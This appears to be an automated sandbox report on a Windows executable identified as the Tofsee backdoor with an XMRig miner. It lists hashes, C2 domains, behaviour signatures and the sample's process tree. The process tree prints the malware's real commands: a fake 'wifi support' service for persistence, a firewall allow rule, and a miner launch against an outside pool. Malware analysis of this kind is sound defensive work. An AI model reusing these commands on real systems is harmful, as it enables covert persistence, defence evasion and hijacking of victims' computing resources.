Overview

overview

10

Static

static

dridex

windows10-1703-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    26/10/2022, 08:05

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    3c2b6d59b3c9a3168f5b0ebab694f8ba4353f068c550717d32c80b2086ba67b2.exe

  • Size

    223KB

  • MD5

    ac263c06e966b53c2cfa5c361af9acbe

  • SHA1

    a4e04f27ceccd14a64c525fbba8566755d44bd93

  • SHA256

    3c2b6d59b3c9a3168f5b0ebab694f8ba4353f068c550717d32c80b2086ba67b2

  • SHA512

    1ea08cb9c2a021fd7d1c2569f6e1f4d5abbe23fc6e461d47154400e989c07515f1c1884a810db11aae1fe471e9611e4535dee5a850ac86d6babd12d948ec7085

  • SSDEEP

    3072:FvqW06LNAyAw7WlTLzGr6j5cBZgmd6SY59lFtaZ7glGHVpFdMPkSTp:FvqbMAE7WVLyrkZx8pFd81

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs 1 IoCs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 1 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3c2b6d59b3c9a3168f5b0ebab694f8ba4353f068c550717d32c80b2086ba67b2.exe
    "C:\Users\Admin\AppData\Local\Temp\3c2b6d59b3c9a3168f5b0ebab694f8ba4353f068c550717d32c80b2086ba67b2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jqnajmmb\
      2⤵
        PID:5020
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\dfitoixy.exe" C:\Windows\SysWOW64\jqnajmmb\
        2⤵
          PID:3652
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create jqnajmmb binPath= "C:\Windows\SysWOW64\jqnajmmb\dfitoixy.exe /d\"C:\Users\Admin\AppData\Local\Temp\3c2b6d59b3c9a3168f5b0ebab694f8ba4353f068c550717d32c80b2086ba67b2.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:3492
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description jqnajmmb "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:2236
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start jqnajmmb
          2⤵
          • Launches sc.exe
          PID:4132
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:2088
      • C:\Windows\SysWOW64\jqnajmmb\dfitoixy.exe
        C:\Windows\SysWOW64\jqnajmmb\dfitoixy.exe /d"C:\Users\Admin\AppData\Local\Temp\3c2b6d59b3c9a3168f5b0ebab694f8ba4353f068c550717d32c80b2086ba67b2.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4380
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:4200
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4916

      Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\dfitoixy.exe
              Filesize

              11.8MB

              MD5

              9deba69e8e4fad337ab61a78c2dd94da

              SHA1

              50c79aa3cf4b20d5e9a2a1f28174ec80f603d78d

              SHA256

              9c1737b9732e41a10ded151b1beea53b7a1fd49e5d48303d33b299526dc5f6b6

              SHA512

              8f7d960501b552575f5471fe9628c00523d124637ccaed63ff7e92fda10d5bea7ca8452762c5692bb1c847d8c32429db259c973143765d124e029374693f8b00

              Download Submit

            • C:\Windows\SysWOW64\jqnajmmb\dfitoixy.exe
              Filesize

              11.8MB

              MD5

              9deba69e8e4fad337ab61a78c2dd94da

              SHA1

              50c79aa3cf4b20d5e9a2a1f28174ec80f603d78d

              SHA256

              9c1737b9732e41a10ded151b1beea53b7a1fd49e5d48303d33b299526dc5f6b6

              SHA512

              8f7d960501b552575f5471fe9628c00523d124637ccaed63ff7e92fda10d5bea7ca8452762c5692bb1c847d8c32429db259c973143765d124e029374693f8b00

              Download Submit

            • memory/2204-162-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-165-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-125-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-126-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-127-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-128-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-129-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-130-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-131-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-132-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-133-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-134-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-135-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-136-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-137-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-138-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-140-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-139-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-141-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-142-0x00000000008B6000-0x00000000008C7000-memory.dmp

              Filesize

              68KB

              Download

            • memory/2204-143-0x00000000007D0000-0x00000000007E3000-memory.dmp

              Filesize

              76KB

              Download

            • memory/2204-144-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-145-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-146-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-147-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-148-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-149-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-150-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-151-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-152-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-153-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-154-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-155-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-156-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-157-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-158-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-159-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-160-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-161-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-120-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-124-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-163-0x0000000000400000-0x0000000000595000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-121-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-166-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-167-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-168-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-169-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-223-0x0000000000400000-0x0000000000595000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-219-0x00000000008B6000-0x00000000008C7000-memory.dmp

              Filesize

              68KB

              Download

            • memory/2204-221-0x00000000007D0000-0x00000000007E3000-memory.dmp

              Filesize

              76KB

              Download

            • memory/2204-122-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-164-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2204-123-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2236-189-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/2236-190-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/3492-183-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/3492-184-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/3492-186-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/3492-187-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/3492-191-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/3652-177-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/3652-181-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/3652-180-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/3652-178-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/3652-176-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/4200-489-0x0000000000B10000-0x0000000000B25000-memory.dmp

              Filesize

              84KB

              Download

            • memory/4200-374-0x0000000000B10000-0x0000000000B25000-memory.dmp

              Filesize

              84KB

              Download

            • memory/4380-316-0x0000000000911000-0x0000000000922000-memory.dmp

              Filesize

              68KB

              Download

            • memory/4380-294-0x0000000000911000-0x0000000000922000-memory.dmp

              Filesize

              68KB

              Download

            • memory/4380-298-0x00000000005A0000-0x00000000006EA000-memory.dmp

              Filesize

              1.3MB

              Download

            • memory/4380-319-0x0000000000400000-0x0000000000595000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/5020-173-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/5020-171-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/5020-179-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/5020-172-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/5020-174-0x0000000077540000-0x00000000776CE000-memory.dmp

              Filesize

              1.6MB

              Download